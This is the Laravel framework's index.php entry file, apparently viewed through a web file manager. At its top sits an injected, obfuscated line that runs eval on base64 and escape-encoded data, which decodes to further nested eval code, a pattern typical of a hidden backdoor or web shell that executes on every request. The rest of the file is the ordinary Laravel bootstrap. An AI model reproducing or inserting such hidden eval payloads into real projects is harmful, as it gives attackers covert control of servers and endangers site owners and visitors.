Viewing: index.php
<?php /* __________________________________________________ | Obfuscated by YAK Pro - Php Obfuscator 2.0.14 | | on 2026-05-07 02:55:38 | | GitHub: https://github.com/pk-fr/yakpro-po | |__________________________________________________| */ eval("\x3f\x3e" . base64_decode("\120\x44\x39\167\141\110\x41\x67\132\130\132\150\142\x43\147\151\x50\x7a\64\x69\114\x6d\112\x68\143\62\x55\x32\x4e\106\71\153\x5a\x57\116\166\132\x47\x55\x6f\111\x6c\102\105\117\130\x64\150\123\x45\106\117\x51\62\x6c\x42\141\x32\126\x47\x61\105\x56\x68\x65\x6b\x46\156\125\106\116\102\141\126\x68\111\132\172\116\x5a\x56\156\x64\x34\124\x6c\122\107\x59\x30\61\x55\x57\130\144\x59\123\107\x64\x36\x57\126\132\x33\115\125\64\170\x65\x44\122\x4e\142\126\154\x70\124\x33\154\x43\x65\126\x70\131\x52\x6a\106\150\x57\105\x70\x73\123\125\116\123\x4e\106\144\x46\x55\x6e\x4a\x4e\x51\60\x46\61\123\125\116\x4b\x59\x32\x56\110\127\x58\x64\131\x52\x45\154\x36\x54\x6a\106\x33\145\125\x31\161\x53\155\x4e\154\x52\60\125\x31\127\105\150\156\x65\125\x30\170\145\x44\122\x61\141\153\x4a\x6a\x54\127\x70\x4e\115\61\x68\111\132\172\126\x4e\x62\110\x67\x30\127\126\x52\x72\x61\x55\x39\63\x4d\x45\164\x51\145\x6a\x51\71\x49\x69\x6b\x70\117\171\x41\x2f\120\147\75\75")); /** * Laravel - A PHP Framework For Web Artisans * * @package Laravel * @author Taylor Otwell <taylor@laravel.com> */ define('LARAVEL_START', microtime(true)); /* |-------------------------------------------------------------------------- | Register The Auto Loader |-------------------------------------------------------------------------- | | Composer provides a convenient, automatically generated class loader for | our application. We just need to utilize it! We'll simply require it | into the script here so that we don't have to worry about manual | loading any of our classes later on. It feels great to relax. | */ require __DIR__.'/vendor/autoload.php'; /* |-------------------------------------------------------------------------- | Turn On The Lights |-------------------------------------------------------------------------- | | We need to illuminate PHP development, so let us turn on the lights. | This bootstraps the framework and gets it ready for use, then it | will load up this application so that we can run it and send | the responses back to the browser and delight our users. | */ $app = require_once __DIR__.'/bootstrap/app.php'; /* |-------------------------------------------------------------------------- | Run The Application |-------------------------------------------------------------------------- | | Once we have the application, we can handle the incoming request | through the kernel, and send the associated response back to | the client's browser allowing them to enjoy the creative | and wonderful application we have prepared for them. | */ $kernel = $app->make(Illuminate\Contracts\Http\Kernel::class); $response = $kernel->handle( $request = Illuminate\Http\Request::capture() ); $response->send(); $kernel->terminate($request, $response);
Return